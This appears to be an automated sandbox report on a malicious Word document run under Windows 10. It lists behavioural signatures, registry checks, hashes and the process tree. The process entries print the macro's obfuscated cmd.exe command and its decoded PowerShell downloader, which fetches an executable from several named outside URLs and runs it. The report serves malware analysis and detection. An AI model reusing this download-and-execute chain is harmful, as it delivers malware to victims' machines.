Analysis
-
max time kernel
143s -
max time network
128s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system -
submitted
19-05-2024 20:34
Behavioral task
behavioral1
Sample
5b5523e3de0be3f3888924ee205feefc_JaffaCakes118.doc
Resource
win7-20240508-en
Behavioral task
behavioral2
Sample
5b5523e3de0be3f3888924ee205feefc_JaffaCakes118.doc
Resource
win10v2004-20240508-en
General
-
Target
5b5523e3de0be3f3888924ee205feefc_JaffaCakes118.doc
-
Size
87KB
-
MD5
5b5523e3de0be3f3888924ee205feefc
-
SHA1
57a0ded868c84a681e05aacfa483e9cf2bdd0875
-
SHA256
6fc0496f0b92374c976b56da6a0e3aa03bd960a04207a0354b0f2ba6c2654be9
-
SHA512
0049a31b6e8fb45d7fddf1b98beda860b8ce21d21ac74efc1a9018ab6b494180b05580a5842a223462d8c1170c16ea7439bf9aff38004b73de145445f3ffbf71
-
SSDEEP
1536:+Bocn1kp59gxBK85fBnx+amHIUAHcAdAbRjf7ZD+gB:X41k/W487oRnZlB
Malware Config
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
cmd.exedescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process 2368 228 cmd.exe WINWORD.EXE -
Blocklisted process makes network request 5 IoCs
Processes:
powershell.exeflow pid process 35 5028 powershell.exe 37 5028 powershell.exe 39 5028 powershell.exe 44 5028 powershell.exe 46 5028 powershell.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
Processes:
WINWORD.EXEpid process 228 WINWORD.EXE 228 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 6 IoCs
Processes:
powershell.exepowershell.exepid process 5028 powershell.exe 5028 powershell.exe 5028 powershell.exe 5052 powershell.exe 5052 powershell.exe 5052 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 5028 powershell.exe Token: SeDebugPrivilege 5052 powershell.exe -
Suspicious use of SetWindowsHookEx 7 IoCs
Processes:
WINWORD.EXEpid process 228 WINWORD.EXE 228 WINWORD.EXE 228 WINWORD.EXE 228 WINWORD.EXE 228 WINWORD.EXE 228 WINWORD.EXE 228 WINWORD.EXE -
Suspicious use of WriteProcessMemory 8 IoCs
Processes:
WINWORD.EXEcmd.execmd.exepowershell.exedescription pid process target process PID 228 wrote to memory of 2368 228 WINWORD.EXE cmd.exe PID 228 wrote to memory of 2368 228 WINWORD.EXE cmd.exe PID 2368 wrote to memory of 4888 2368 cmd.exe cmd.exe PID 2368 wrote to memory of 4888 2368 cmd.exe cmd.exe PID 4888 wrote to memory of 5028 4888 cmd.exe powershell.exe PID 4888 wrote to memory of 5028 4888 cmd.exe powershell.exe PID 5028 wrote to memory of 5052 5028 powershell.exe powershell.exe PID 5028 wrote to memory of 5052 5028 powershell.exe powershell.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\5b5523e3de0be3f3888924ee205feefc_JaffaCakes118.doc" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:228 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\system32\cmd.exe /V/C"set NO= }}{hctac}}kaerb;miZ$ ssecorP-tratS;)miZ$(elifotevas.icW$;)ydoBesnopser.pFo$(etirw.icW$;1 = epyt.icW$;)(nepo.icW${ )'*ZM*' ekil- txetesnopser.pFo$( fI;)(dnes.pFo$;)0,kkN$,'TEG'(nepo.pFo${yrt{)jLw$ ni kkN$(hcaerof;'maerts.bdoda' moc- tcejbO-weN = icW$;'ptthlmx.2lmxsm' moc- tcejbO-weN= pFo$;)'exe.hsr\'+)(htaPpmeTteG::]htaP.OI.metsyS[(=miZ$;)'@'(tilpS.'ZQgHugt/ehcac/rotartsinimda/ur.sur-yelwon//:ptth@4VdQeG/moc.steemerutnev//:ptth@I4ow42l/20000/tnetnoc-pw/ra.ude.tnu.noisnetxeairaterces//:ptth@Zt5waA/moc.sruotocetpyge//:ptth@Vwguf1ym/moc.ruot-xnihps//:ptth'=jLw$;'Hww'=Ftz$ llehsrewop&&for /L %U in (601;-1;0)do set jtC=!jtC!!NO:~%U,1!&&if %U equ 0 powershell "!jtC:*jtC!=!" "2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:2368 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /V/C"set NO= }}{hctac}}kaerb;miZ$ ssecorP-tratS;)miZ$(elifotevas.icW$;)ydoBesnopser.pFo$(etirw.icW$;1 = epyt.icW$;)(nepo.icW${ )'*ZM*' ekil- txetesnopser.pFo$( fI;)(dnes.pFo$;)0,kkN$,'TEG'(nepo.pFo${yrt{)jLw$ ni kkN$(hcaerof;'maerts.bdoda' moc- tcejbO-weN = icW$;'ptthlmx.2lmxsm' moc- tcejbO-weN= pFo$;)'exe.hsr\'+)(htaPpmeTteG::]htaP.OI.metsyS[(=miZ$;)'@'(tilpS.'ZQgHugt/ehcac/rotartsinimda/ur.sur-yelwon//:ptth@4VdQeG/moc.steemerutnev//:ptth@I4ow42l/20000/tnetnoc-pw/ra.ude.tnu.noisnetxeairaterces//:ptth@Zt5waA/moc.sruotocetpyge//:ptth@Vwguf1ym/moc.ruot-xnihps//:ptth'=jLw$;'Hww'=Ftz$ llehsrewop&&for /L %U in (601;-1;0)do set jtC=!jtC!!NO:~%U,1!&&if %U equ 0 powershell "!jtC:*jtC!=!" "3⤵
- Suspicious use of WriteProcessMemory
PID:4888 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell "powershell $ztF='wwH';$wLj='http://sphinx-tour.com/my1fugwV@http://egyptecotours.com/Aaw5tZ@http://secretariaextension.unt.edu.ar/wp-content/00002/l24wo4I@http://venturemeets.com/GeQdV4@http://nowley-rus.ru/administrator/cache/tguHgQZ'.Split('@');$Zim=([System.IO.Path]::GetTempPath()+'\rsh.exe');$oFp =New-Object -com 'msxml2.xmlhttp';$Wci = New-Object -com 'adodb.stream';foreach($Nkk in $wLj){try{$oFp.open('GET',$Nkk,0);$oFp.send();If ($oFp.responsetext -like '*MZ*') {$Wci.open();$Wci.type = 1;$Wci.write($oFp.responseBody);$Wci.savetofile($Zim);Start-Process $Zim;break}}catch{}} "4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5028 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" =wwH5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5052
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4396,i,7012731823941922179,12386606396608877869,262144 --variations-seed-version --mojo-platform-channel-handle=4252 /prefetch:81⤵PID:4548
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
1KB
MD5daac9c13da6de6812b488fe70af0184c
SHA11ec08d3ce601c8912c1bb293d6d5bc750491e186
SHA256a36e315cb51ad4e3a8fc69ae369b1bdbc092554cef27b44a012c059d0184a8b5
SHA5125b634a6c7b4f9d55754ca6c49be18ee4757e1aa5665084b2b1f87e4fc91c5e751ec198e636078aaecaafce416349fae990da0c2f12d22aa6d77dfb56032e8d8d
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
46KB
MD5e2920bcbd7697b2ae8c173d960d3f7e8
SHA168abec37585dedb6d2f6315c8a517329575c4765
SHA256d81fd25989f5b70c0c8652bc6d8102fd83fc3a752ebeabb76bca9edf907d0e27
SHA512ec53467fa1317d0f8882f90fcd0adc58228b0086db80a072b28f9d7a7173e05d9e8c3041c397cd45094fdbaf604bdd94c9e4e05e57d71a82959420926bf72688
-
C:\Users\Admin\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851218[[fn=gb]].xsl
Filesize262KB
MD551d32ee5bc7ab811041f799652d26e04
SHA1412193006aa3ef19e0a57e16acf86b830993024a
SHA2566230814bf5b2d554397580613e20681752240ab87fd354ececf188c1eabe0e97
SHA5125fc5d889b0c8e5ef464b76f0c4c9e61bda59b2d1205ac9417cc74d6e9f989fb73d78b4eb3044a1a1e1f2c00ce1ca1bd6d4d07eeadc4108c7b124867711c31810